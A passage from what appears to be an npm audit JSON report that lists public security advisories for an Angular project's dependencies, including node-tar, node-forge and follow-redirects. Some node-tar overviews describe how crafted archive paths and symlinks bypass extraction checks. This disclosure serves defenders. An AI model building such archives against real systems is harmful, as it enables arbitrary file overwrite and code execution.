"[\"CWE-269\"]", + "found_by": null, + "deleted": null, + "id": 1059412, + "references": "- https://github.com/shelljs/shelljs/security/advisories/GHSA-64g7-mvw6-v9qj\n- https://huntr.dev/bounties/50996581-c08e-4eed-a90e-c0bac082679c/\n- https://github.com/advisories/GHSA-64g7-mvw6-v9qj", + "created": "2022-03-09T20:00:43.994Z", + "reported_by": null, + "title": "Improper Privilege Management in shelljs", + "npm_advisory_id": null, + "overview": "### Impact\nOutput from the synchronous version of `shell.exec()` may be visible to other users on the same system. You may be affected if you execute `shell.exec()` in multi-user Mac, Linux, or WSL environments, or if you execute `shell.exec()` as the root user.\n\nOther shelljs functions (including the asynchronous version of `shell.exec()`) are not impacted.\n\n### Patches\nPatched in shelljs 0.8.5\n\n### Workarounds\nRecommended action is to upgrade to 0.8.5.\n\n### References\nhttps://huntr.dev/bounties/50996581-c08e-4eed-a90e-c0bac082679c/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Ask at https://github.com/shelljs/shelljs/issues/1058\n* Open an issue at https://github.com/shelljs/shelljs/issues/new\n", + "url": "https://github.com/advisories/GHSA-64g7-mvw6-v9qj" + }, + "1059413": { + "findings": [ + { + "version": "0.10.0", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>selfsigned>node-forge" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.0.0", + "module_name": "node-forge", + "severity": "moderate", + "github_advisory_id": "GHSA-8fr3-hfg3-gpgp", + "cves": [ + "CVE-2022-0122" + ], + "access": "public", + "patched_versions": ">=1.0.0", + "cvss": { + "score": 0, + "vectorString": null + }, + "updated": "2022-01-13T18:50:00.000Z", + "recommendation": "Upgrade to version 1.0.0 or later", + "cwe": "[\"CWE-601\"]", + "found_by": null, + "deleted": null, + "id": 1059413, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2022-0122\n- https://github.com/digitalbazaar/forge/commit/db8016c805371e72b06d8e2edfe0ace0df934a5e\n- https://huntr.dev/bounties/41852c50-3c6d-4703-8c55-4db27164a4ae\n- https://github.com/advisories/GHSA-8fr3-hfg3-gpgp", + "created": "2022-03-09T20:00:43.994Z", + "reported_by": null, + "title": "Open Redirect in node-forge", + "npm_advisory_id": null, + "overview": "parseUrl functionality in node-forge mishandles certain uses of backslash such as https:/\\/\\/\\ and interprets the URI as a relative path. ", + "url": "https://github.com/advisories/GHSA-8fr3-hfg3-gpgp" + }, + "1059420": { + "findings": [ + { + "version": "1.7.0", + "paths": [ + "karma>http-proxy>follow-redirects", + "@angular-devkit/build-angular>webpack-dev-server>http-proxy-middleware>http-proxy>follow-redirects" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.14.7", + "module_name": "follow-redirects", + "severity": "high", + "github_advisory_id": "GHSA-74fj-2j2h-c42q", + "cves": [ + "CVE-2022-0155" + ], + "access": "public", + "patched_versions": ">=1.14.7", + "cvss": { + "score": 8, + "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + }, + "updated": "2022-01-11T18:41:09.000Z", + "recommendation": "Upgrade to version 1.14.7 or later", + "cwe": "[\"CWE-359\"]", + "found_by": null, + "deleted": null, + "id": 1059420, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2022-0155\n- https://github.com/follow-redirects/follow-redirects/commit/8b347cbcef7c7b72a6e9be20f5710c17d6163c22\n- https://huntr.dev/bounties/fc524e4b-ebb6-427d-ab67-a64181020406\n- https://github.com/advisories/GHSA-74fj-2j2h-c42q", + "created": "2022-03-09T20:00:43.995Z", + "reported_by": null, + "title": "Exposure of sensitive information in follow-redirects", + "npm_advisory_id": null, + "overview": "follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor", + "url": "https://github.com/advisories/GHSA-74fj-2j2h-c42q" + }, + "1059432": { + "findings": [ + { + "version": "0.10.0", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>selfsigned>node-forge" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.0.0", + "module_name": "node-forge", + "severity": "low", + "github_advisory_id": "GHSA-5rrq-pxf6-6jx5", + "cves": [], + "access": "public", + "patched_versions": ">=1.0.0", + "cvss": { + "score": 0, + "vectorString": null + }, + "updated": "2022-01-07T22:20:53.000Z", + "recommendation": "Upgrade to version 1.0.0 or later", + "cwe": "[\"CWE-1321\"]", + "found_by": null, + "deleted": null, + "id": 1059432, + "references": "- https://github.com/digitalbazaar/forge/security/advisories/GHSA-5rrq-pxf6-6jx5\n- https://github.com/advisories/GHSA-5rrq-pxf6-6jx5", + "created": "2022-03-09T20:00:43.997Z", + "reported_by": null, + "title": "Prototype Pollution in node-forge debug API.", + "npm_advisory_id": null, + "overview": "### Impact\nThe `forge.debug` API had a potential prototype pollution issue if called with untrusted input. The API was only used for internal debug purposes in a safe way and never documented or advertised. It is suspected that uses of this API, if any exist, would likely not have used untrusted inputs in a vulnerable way.\n\n### Patches\nThe `forge.debug` API and related functions were removed in 1.0.0.\n\n### Workarounds\nDon't use the `forge.debug` API directly or indirectly with untrusted input.\n\n### References\n- https://www.huntr.dev/bounties/1-npm-node-forge/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge).\n* Email us at support@digitalbazaar.com.", + "url": "https://github.com/advisories/GHSA-5rrq-pxf6-6jx5" + }, + "1059434": { + "findings": [ + { + "version": "0.10.0", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>selfsigned>node-forge" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.0.0", + "module_name": "node-forge", + "severity": "low", + "github_advisory_id": "GHSA-gf8q-jrpm-jvxq", + "cves": [], + "access": "public", + "patched_versions": ">=1.0.0", + "cvss": { + "score": 0, + "vectorString": null + }, + "updated": "2022-01-07T22:20:43.000Z", + "recommendation": "Upgrade to version 1.0.0 or later", + "cwe": "[]", + "found_by": null, + "deleted": null, + "id": 1059434, + "references": "- https://github.com/digitalbazaar/forge/security/advisories/GHSA-gf8q-jrpm-jvxq\n- https://github.com/advisories/GHSA-gf8q-jrpm-jvxq", + "created": "2022-03-09T20:00:43.997Z", + "reported_by": null, + "title": "URL parsing in node-forge could lead to undesired behavior.", + "npm_advisory_id": null, + "overview": "### Impact\nThe regex used for the `forge.util.parseUrl` API would not properly parse certain inputs resulting in a parsed data structure that could lead to undesired behavior.\n\n### Patches\n`forge.util.parseUrl` and other very old related URL APIs were removed in 1.0.0 in favor of letting applications use the more modern WHATWG URL Standard API.\n\n### Workarounds\nEnsure code does not directly or indirectly call `forge.util.parseUrl` with untrusted input.\n\n### References\n- https://www.huntr.dev/bounties/41852c50-3c6d-4703-8c55-4db27164a4ae/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge)\n* Email us at support@digitalbazaar.com\n", + "url": "https://github.com/advisories/GHSA-gf8q-jrpm-jvxq" + }, + "1059486": { + "findings": [ + { + "version": "0.2.3", + "paths": [ + "@angular-devkit/build-angular>less>request>http-signature>jsprim>json-schema" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<0.4.0", + "module_name": "json-schema", + "severity": "moderate", + "github_advisory_id": "GHSA-896r-f27r-55mw", + "cves": [ + "CVE-2021-3918" + ], + "access": "public", + "patched_versions": ">=0.4.0", + "cvss": { + "score": 9.8, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + "updated": "2021-11-15T22:44:28.000Z", + "recommendation": "Upgrade to version 0.4.0 or later", + "cwe": "[\"CWE-915\",\"CWE-1321\"]", + "found_by": null, + "deleted": null, + "id": 1059486, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-3918\n- https://github.com/kriszyp/json-schema/commit/22f146111f541d9737e832823699ad3528ca7741\n- https://huntr.dev/bounties/bb6ccd63-f505-4e3a-b55f-cd2662c261a9\n- https://github.com/kriszyp/json-schema/commit/b62f1da1ff5442f23443d6be6a92d00e65cba93a\n- https://github.com/kriszyp/json-schema/commit/f6f6a3b02d667aa4ba2d5d50cc19208c4462abfa\n- https://github.com/advisories/GHSA-896r-f27r-55mw", + "created": "2022-03-09T20:00:44.009Z", + "reported_by": null, + "title": "json-schema is vulnerable to Prototype Pollution", + "npm_advisory_id": null, + "overview": "json-schema is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')", + "url": "https://github.com/advisories/GHSA-896r-f27r-55mw" + }, + "1059599": { + "findings": [ + { + "version": "3.0.0", + "paths": [ + "@angular/cli>inquirer>string-width>strip-ansi>ansi-regex", + "@angular/compiler-cli>yargs>cliui>string-width>strip-ansi>ansi-regex", + "@angular-devkit/build-angular>webpack-dev-server>yargs>cliui>string-width>strip-ansi>ansi-regex" + ] + }, + { + "version": "3.0.0", + "paths": [ + "@angular/compiler-cli>yargs>cliui>strip-ansi>ansi-regex", + "@angular-devkit/build-angular>webpack-dev-server>yargs>cliui>strip-ansi>ansi-regex" + ] + }, + { + "version": "4.1.0", + "paths": [ + "@angular/cli>inquirer>strip-ansi>ansi-regex" + ] + }, + { + "version": "4.1.0", + "paths": [ + "@angular/compiler-cli>yargs>string-width>strip-ansi>ansi-regex" + ] + } + ], + "metadata": null, + "vulnerable_versions": ">2.1.1 <5.0.1", + "module_name": "ansi-regex", + "severity": "moderate", + "github_advisory_id": "GHSA-93q8-gq69-wqmw", + "cves": [ + "CVE-2021-3807" + ], + "access": "public", + "patched_versions": ">=5.0.1", + "cvss": { + "score": 7.5, + "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + "updated": "2021-09-23T15:45:50.000Z", + "recommendation": "Upgrade to version 5.0.1 or later", + "cwe": "[\"CWE-918\",\"CWE-1333\"]", + "found_by": null, + "deleted": null, + "id": 1059599, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-3807\n- https://github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9\n- https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994\n- https://github.com/chalk/ansi-regex/issues/38#issuecomment-924086311\n- https://app.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908\n- https://github.com/chalk/ansi-regex/issues/38#issuecomment-925924774\n- https://github.com/advisories/GHSA-93q8-gq69-wqmw", + "created": "2022-03-09T20:00:44.023Z", + "reported_by": null, + "title": " Inefficient Regular Expression Complexity in chalk/ansi-regex", + "npm_advisory_id": null, + "overview": "ansi-regex is vulnerable to Inefficient Regular Expression Complexity", + "url": "https://github.com/advisories/GHSA-93q8-gq69-wqmw" + }, + "1059698": { + "findings": [ + { + "version": "4.4.8", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar" + ] + }, + { + "version": "4.4.8", + "paths": [ + "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<4.4.18", + "module_name": "tar", + "severity": "high", + "github_advisory_id": "GHSA-5955-9wpr-37jh", + "cves": [ + "CVE-2021-37713" + ], + "access": "public", + "patched_versions": ">=4.4.18", + "cvss": { + "score": 8.2, + "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" + }, + "updated": "2021-08-31T16:02:33.000Z", + "recommendation": "Upgrade to version 4.4.18 or later", + "cwe": "[\"CWE-22\"]", + "found_by": null, + "deleted": null, + "id": 1059698, + "references": "- https://github.com/npm/node-tar/security/advisories/GHSA-5955-9wpr-37jh\n- https://www.npmjs.com/package/tar\n- https://nvd.nist.gov/vuln/detail/CVE-2021-37713\n- https://www.oracle.com/security-alerts/cpuoct2021.html\n- https://github.com/advisories/GHSA-5955-9wpr-37jh", + "created": "2022-03-09T20:00:44.036Z", + "reported_by": null, + "title": "Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization", + "npm_advisory_id": null, + "overview": "### Impact\n\nArbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution\n\nnode-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain `..` path portions, and resolving the sanitized paths against the extraction target directory.\n\nThis logic was insufficient on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target, such as `C:some\\path`. If the drive letter does not match the extraction target, for example `D:\\extraction\\dir`, then the result of `path.resolve(extractionDirectory, entryPath)` would resolve against the current working directory on the `C:` drive, rather than the extraction target directory.\n\nAdditionally, a `..` portion of the path could occur immediately after the drive letter, such as `C:../foo`, and was not properly sanitized by the logic that checked for `..` within the normalized and split portions of the path.\n\nThis only affects users of `node-tar` on Windows systems.\n\n### Patches\n\n4.4.18 || 5.0.10 || 6.1.9\n\n### Workarounds\n\nThere is no reasonable way to work around this issue without performing the same path normalization procedures that node-tar now does.\n\nUsers are encouraged to upgrade to the latest patched versions of node-tar, rather than attempt to sanitize paths themselves.\n\n### Fix\n\nThe fixed versions strip path roots from all paths prior to being resolved against the extraction target folder, even if such paths are not \"absolute\".\n\nAdditionally, a path starting with a drive letter and then two dots, like `c:../`, would bypass the check for `..` path portions. This is checked properly in the patched versions.\n\nFinally, a defense in depth check is added, such that if the `entry.absolute` is outside of the extraction taret, and we are not in preservePaths:true mode, a warning is raised on that entry, and it is skipped. Currently, it is believed that this check is redundant, but it did catch some oversights in development.\n", + "url": "https://github.com/advisories/GHSA-5955-9wpr-37jh" + }, + "1059701": { + "findings": [ + { + "version": "4.4.8", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar" + ] + }, + { + "version": "4.4.8", + "paths": [ + "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<4.4.18", + "module_name": "tar", + "severity": "high", + "github_advisory_id": "GHSA-qq89-hq3f-393p", + "cves": [ + "CVE-2021-37712" + ], + "access": "public", + "patched_versions": ">=4.4.18", + "cvss": { + "score": 8.2, + "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" + }, + "updated": "2021-08-31T16:02:05.000Z", + "recommendation": "Upgrade to version 4.4.18 or later", + "cwe": "[\"CWE-22\",\"CWE-59\"]", + "found_by": null, + "deleted": null, + "id": 1059701, + "references": "- https://github.com/npm/node-tar/security/advisories/GHSA-qq89-hq3f-393p\n- https://www.npmjs.com/package/tar\n- https://nvd.nist.gov/vuln/detail/CVE-2021-37712\n- https://www.oracle.com/security-alerts/cpuoct2021.html\n- https://www.debian.org/security/2021/dsa-5008\n- https://github.com/advisories/GHSA-qq89-hq3f-393p", + "created": "2022-03-09T20:00:44.036Z", + "reported_by": null, + "title": "Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links", + "npm_advisory_id": null, + "overview": "### Impact\nArbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution\n\nnode-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.\n\nThis logic was insufficient when extracting tar files that contained two directories and a symlink with names containing unicode values that normalized to the same value. Additionally, on Windows systems, long path portions would resolve to the same file system entities as their 8.3 \"short path\" counterparts. A specially crafted tar archive could thus include directories with two forms of the path that resolve to the same file system entity, followed by a symbolic link with a name in the first form, lastly followed by a file using the second form. It led to bypassing node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.\n\nThe v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below.\n\n### Patches\n\n6.1.9 || 5.0.10 || 4.4.18\n\n### Workarounds\n\nUsers may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links.\n\n```js\nconst tar = require('tar')\n\ntar.x({\n file: 'archive.tgz',\n filter: (file, entry) => {\n if (entry.type === 'SymbolicLink') {\n return false\n } else {\n return true\n }\n }\n})\n```\n\nUsers are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves.\n\n#### Fix\n\nThe problem is addressed in the following ways, when comparing paths in the directory cache and path reservation systems:\n\n1. The `String.normalize('NFKD')` method is used to first normalize all unicode to its maximally compatible and multi-code-point form.\n2. All slashes are normalized to `/` on Windows systems (on posix systems, `\\` is a valid filename character, and thus left intact).\n3. When a symbolic link is encountered on Windows systems, the entire directory cache is cleared. Collisions related to use of 8.3 short names to replace directories with other (non-symlink) types of entries may make archives fail to extract properly, but will not result in arbitrary file writes.\n", + "url": "https://github.com/advisories/GHSA-qq89-hq3f-393p" + }, + "1059704": { + "findings": [ + { + "version": "4.4.8", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar" + ] + }, + { + "version": "4.4.8", + "paths": [ + "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<4.4.16", + "module_name": "tar", + "severity": "high", + "github_advisory_id": "GHSA-9r2w-394v-53qc", + "cves": [ + "CVE-2021-37701" + ], + "access": "public", + "patched_versions": ">=4.4.16", + "cvss": { + "score": 8.2, + "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" + }, + "updated": "2021-08-31T16:01:51.000Z", + "recommendation": "Upgrade to version 4.4.16 or later", + "cwe": "[\"CWE-22\",\"CWE-59\"]", + "found_by": null, + "deleted": null, + "id": 1059704, + "references": "- https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc\n- https://www.npmjs.com/package/tar\n- https://nvd.nist.gov/vuln/detail/CVE-2021-37701\n- https://www.oracle.com/security-alerts/cpuoct2021.html\n- https://www.debian.org/security/2021/dsa-5008\n- https://github.com/advisories/GHSA-9r2w-394v-53qc", + "created": "2022-03-09T20:00:44.036Z", + "reported_by": null, + "title": "Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links", + "npm_advisory_id": null, + "overview": "### Impact\n\nArbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution\n\n`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.\n\nThis logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\\` and `/` characters as path separators, however `\\` is a valid filename character on posix systems.\n\nBy first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.\n\nAdditionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. \n\nThese issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7.\n\nThe v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below.\n\n### Patches\n\n4.4.16 || 5.0.8 || 6.1.7\n\n### Workarounds\n\nUsers may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links.\n\n```js\nconst tar = require('tar')\n\ntar.x({\n file: 'archive.tgz',\n filter: (file, entry) => {\n if (entry.type === 'SymbolicLink') {\n return false\n } else {\n return true\n }\n }\n})\n```\n\nUsers are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves.\n\n### Fix\n\nThe problem is addressed in the following ways:\n\n1. All paths are normalized to use `/` as a path separator, replacing `\\` with `/` on Windows systems, and leaving `\\` intact in the path on posix systems. This is performed in depth, at every level of the program where paths are consumed.\n2. Directory cache pruning is performed case-insensitively. This _may_ result in undue cache misses on case-sensitive file systems, but the performance impact is negligible.\n\n#### Caveat\n\nNote that this means that the `entry` objects exposed in various parts of tar's API will now always use `/` as a path separator, even on Windows systems. This is not expected to cause problems, as `/` is a valid path separator on Windows systems, but _may_ result in issues if `entry.path` is compared against a path string coming from some other API such as `fs.realpath()` or `path.resolve()`.\n\nUsers are encouraged to always normalize paths using a well-tested method such as `path.resolve()` before comparing paths to one another.", + "url": "https://github.com/advisories/GHSA-9r2w-394v-53qc" + }, + "1059733": { + "findings": [ + { + "version": "4.4.8", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar" + ] + }, + { + "version": "4.4.8", + "paths": [ + "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar" + ] + } + ], + "metadata": null, + "vulnerable_versions": ">=4.0.0 <4.4.14", + "module_name": "tar", + "severity": "high", + "github_advisory_id": "GHSA-3jfq-g458-7qm9", + "cves": [ + "CVE-2021-32804" + ], + "access": "public", + "patched_versions": ">=4.4.14", + "cvss": { + "score": 8.2, + "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" + }, + "updated": "2021-08-03T19:06:16.000Z", + "recommendation": "Upgrade to version 4.4.14 or later", + "cwe": "[\"CWE-22\"]", + "found_by": null, + "deleted": null, + "id": 1059733, + "references": "- https://github.com/npm/node-tar/security/advisories/GHSA-3jfq-g458-7qm9\n- https://github.com/npm/node-tar/commit/1f036ca23f64a547bdd6c79c1a44bc62e8115da4\n- https://www.npmjs.com/advisories/1770\n- https://www.npmjs.com/package/tar\n- https://nvd.nist.gov/vuln/detail/CVE-2021-32804\n- https://www.oracle.com/security-alerts/cpuoct2021.html\n- https://github.com/advisories/GHSA-3jfq-g458-7qm9", + "created": "2022-03-09T20:00:44.039Z", + "reported_by": null, + "title": "Arbitrary File Creation/Overwrite due to insufficient absolute path sanitization", + "npm_advisory_id": null, + "overview": "### Impact\n\nArbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution\n\n`node-tar` aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example `/home/user/.bashrc` would turn into `home/user/.bashrc`. \n\nThis logic was insufficient when file paths contained repeated path roots such as `////home/user/.bashrc`. `node-tar` would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. `///home/user/.bashrc`) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite. \n\n### Patches\n\n3.2.2 || 4.4.14 || 5.0.6 || 6.1.1\n\nNOTE: an adjacent issue [CVE-2021-32803](https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw) affects this release level. Please ensure you update to the latest patch levels that address CVE-2021-32803 as well if this adjacent issue affects your `node-tar` use case.\n\n### Workarounds\n\nUsers may work around this vulnerability without upgrading by creating a custom `onentry` method which sanitizes the `entry.path` or a `filter` method which removes entries with absolute paths.\n\n```js\nconst path = require('path')\nconst tar = require('tar')\n\ntar.x({\n file: 'archive.tgz',\n // either add this function...\n onentry: (entry) => {\n if (path.isAbsolute(entry.path)) {\n entry.path = sanitizeAbsolutePathSomehow(entry.path)\n entry.absolute = path.resolve(entry.path)\n }\n },\n\n // or this one\n filter: (file, entry) => {\n if (path.isAbsolute(entry.path)) {\n return false\n } else {\n return true\n }\n }\n})\n```\n\nUsers are encouraged to upgrade to the latest patch versions, rather than attempt to sanitize tar input themselves.", + "url": "https://github.com/advisories/GHSA-3jfq-g458-7qm9" + }, + "1059737": { + "findings": [ + { + "version": "4.4.8", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar" + ] + }, + { + "version": "4.4.8", + "paths": [ + "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar" + ] + } + ], + "metadata": null, + "vulnerable_versions": ">=4.0.0 <4.4.15", + "module_name": "tar", + "severity": "high", + "github_advisory_id": "GHSA-r628-mhmh-qjhw", + "cves": [ + "CVE-2021-32803" + ], + "access": "public", + "patched_versions": ">=4.4.15", + "cvss": { + "score": 8.2, + "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" + }, + "updated": "2021-08-03T18:59:59.000Z", + "recommendation": "Upgrade to version 4.4.15 or later", + "cwe": "[\"CWE-22\",\"CWE-23\"]", + "found_by": null, + "deleted": null, + "id": 1059737, + "references": "- https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw\n- https://github.com/npm/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20\n- https://www.npmjs.com/advisories/1771\n- https://nvd.nist.gov/vuln/detail/CVE-2021-32803\n- https://www.npmjs.com/package/tar\n- https://www.oracle.com/security-alerts/cpuoct2021.html\n- https://github.com/advisories/GHSA-r628-mhmh-qjhw", + "created": "2022-03-09T20:00:44.040Z", + "reported_by": null, + "title": "Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning", + "npm_advisory_id": null, + "overview": "### Impact\n\nArbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution\n\n`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created.\n\nThis logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory. This order of operations resulted in the directory being created and added to the `node-tar` directory cache. When a directory is present in the directory cache, subsequent calls to mkdir for that directory are skipped. However, this is also where `node-tar` checks for symlinks occur.\n\nBy first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.\n\nThis issue was addressed in releases 3.2.3, 4.4.15, 5.0.7 and 6.1.2.\n\n### Patches\n\n3.2.3 || 4.4.15 || 5.0.7 || 6.1.2\n\n### Workarounds\n\nUsers may work around this vulnerability without upgrading by creating a custom `filter` method which prevents the extraction of symbolic links.\n\n```js\nconst tar = require('tar')\n\ntar.x({\n file: 'archive.tgz',\n filter: (file, entry) => {\n if (entry.type === 'SymbolicLink') {\n return false\n } else {\n return true\n }\n }\n})\n```\n\nUsers are encouraged to upgrade to the latest patch versions, rather than attempt to sanitize tar input themselves.", + "url": "https://github.com/advisories/GHSA-r628-mhmh-qjhw" + }, + "1059778": { + "findings": [ + { + "version": "3.2.0", + "paths": [ + "karma>socket.io>socket.io-parser", + "karma>socket.io>socket.io-client>socket.io-parser" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<3.3.2", + "module_name": "socket.io-parser", + "severity": "high", + "github_advisory_id": "GHSA-xfhh-g9f5-x4m4", + "cves": [ + "CVE-2020-36049" + ], + "access": "public", + "patched_versions": ">=3.3.2", + "cvss": { + "score": 7.5, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + "updated": "2021-06-30T16:54:43.000Z", + "recommendation": "Upgrade to version 3.3.2 or later", + "cwe": "[\"CWE-400\"]", + "found_by": null, + "deleted": null, + "id": 1059778, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-36049\n- https://github.com/socketio/socket.io-parser/commit/dcb942d24db97162ad16a67c2a0cf30875342d55\n- https://blog.caller.xyz/socketio-engineio-dos/\n- https://github.com/bcaller/kill-engine-io\n- https://github.com/socketio/socket.io-parser/releases/tag/3.3.2\n- https://github.com/socketio/socket.io-parser/releases/tag/3.4.1\n- https://www.npmjs.com/package/socket.io-parser\n- https://github.com/advisories/GHSA-xfhh-g9f5-x4m4", + "created": "2022-03-09T20:00:44.044Z", + "reported_by": null, + "title": "Resource exhaustion in socket.io-parser", + "npm_advisory_id": null, + "overview": "The `socket.io-parser` npm package before versions 3.3.2 and 3.4.1 allows attackers to cause a denial of service (memory consumption) via a large packet because a concatenation approach is used.", + "url": "https://github.com/advisories/GHSA-xfhh-g9f5-x4m4" + }, + "1059799": { + "findings": [ + { + "version": "7.0.17", + "paths": [ + "@angular-devkit/build-angular>postcss" + ] + } + ], + "metadata": null, + "vulnerable_versions": ">=7.0.0 <7.0.36", + "module_name": "postcss", + "severity": "moderate", + "github_advisory_id": "GHSA-hwj9-h5mp-3pm3", + "cves": [ + "CVE-2021-23368" + ], + "access": "public", + "patched_versions": ">=7.0.36", + "cvss": { + "score": 5.3, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + "updated": "2021-06-15T15:12:13.000Z", + "recommendation": "Upgrade to version 7.0.36 or later", + "cwe": "[\"CWE-400\"]", + "found_by": null, + "deleted": null, + "id": 1059799, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-23368\n- https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4\n- https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5\n- https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E\n- https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E\n- 